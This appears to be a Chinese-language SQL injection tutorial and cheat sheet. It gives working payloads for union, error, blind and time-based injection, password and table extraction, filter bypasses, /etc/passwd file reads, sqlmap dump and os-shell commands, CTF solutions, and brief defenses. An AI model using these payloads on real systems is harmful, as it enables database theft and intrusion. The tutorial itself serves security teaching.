SQL注入（SQL Injection）详解与实战

SQL注入是一种通过用户输入构造恶意SQL语句，干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。

联合查询注入（Union-Based）
利用UNION SELECT拼接查询结果，直接回显数据。

' UNION SELECT username, password FROM users--
报错注入（Error-Based）
通过触发数据库报错泄露信息（如MySQL的updatexml或extractvalue）。

' AND updatexml(1, concat(0x7e, (SELECT user())), 1)--
布尔盲注（Boolean-Based Blind）
通过页面返回的真假状态推断数据（如返回内容差异或HTTP状态码）。

' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'--
时间盲注（Time-Based Blind）
通过延时响应判断条件是否成立（如MySQL的sleep()）。

' AND IF(1=1, SLEEP(5), 0)--

检测注入点
- 输入单引号'触发数据库错误（如You have an error in your SQL syntax）。
- 测试逻辑条件：
  
  id=1' AND 1=1-- （页面正常） id=1' AND 1=2-- （页面异常）
确定字段数（ORDER BY）

' ORDER BY 3-- （无报错） ' ORDER BY 4-- （报错→字段数为3）
联合查询获取数据

' UNION SELECT 1,2,3-- （确定回显位） ' UNION SELECT database(), user(), version()--
提取表名与列名

' UNION SELECT 1, group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=database()-- ' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='users'--
获取敏感数据

' UNION SELECT 1, username, password FROM users--

绕过过滤
- 大小写绕过：UnIoN SeLeCt（部分过滤器不区分大小写）。
- 注释符：-- （空格）、#、/*...*/。
- 编码绕过：URL编码（%27代替'）、十六进制（0x...）。
- 空格绕过：用/**/或+代替空格（如UNION/**/SELECT）。
利用字符串拼接
- MySQL：'||'1'='1' → ' OR '1'='1。
- SQLite：'||1=1-- 。
利用数据库特性
- MySQL：LOAD_FILE('/etc/passwd')读取文件。
- PostgreSQL：pg_read_file('/etc/passwd')。
- SQLite：sqlite_version()获取版本。

基本用法

sqlmap -u "http://target.com/page?id=1" --dbs # 获取所有数据库名 sqlmap -u "http://target.com/page?id=1" -D dbname --tables # 获取表名 sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # 导出数据
高级参数
- --level=3：提高检测等级（包含Cookie注入）。
- --risk=3：允许高风险操作（如文件写入）。
- --os-shell：尝试获取系统Shell（需高权限）。

参数化查询（预编译）

Python

# Python示例（使用SQLAlchemy） result = db.session.execute('SELECT * FROM users WHERE id = :id', {'id': user_id})
输入过滤
- 过滤特殊字符（' " ; --）。
- 限制输入类型（如数字类型强制转换为整数）。
最小权限原则
- 数据库用户仅授予必要权限（禁止FILE、EXECUTE等）。

题目：登录页面存在SQL注入，获取管理员密码。

SQL

' OR 1=1 -- ' UNION SELECT null, password FROM users WHERE username='admin'--
题目：过滤了空格和UNION，利用盲注获取数据。

SQL

'||(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN SLEEP(5) ELSE 0 END FROM users)#

练习平台：
- PortSwigger SQLi Labs（https://portswigger.net/web-security/sql-injection）
- SQLi Labs（GitHub开源靶场）
深入阅读：
- 《SQL注入攻击与防御（第2版）》
- OWASP SQL Injection Cheat Sheet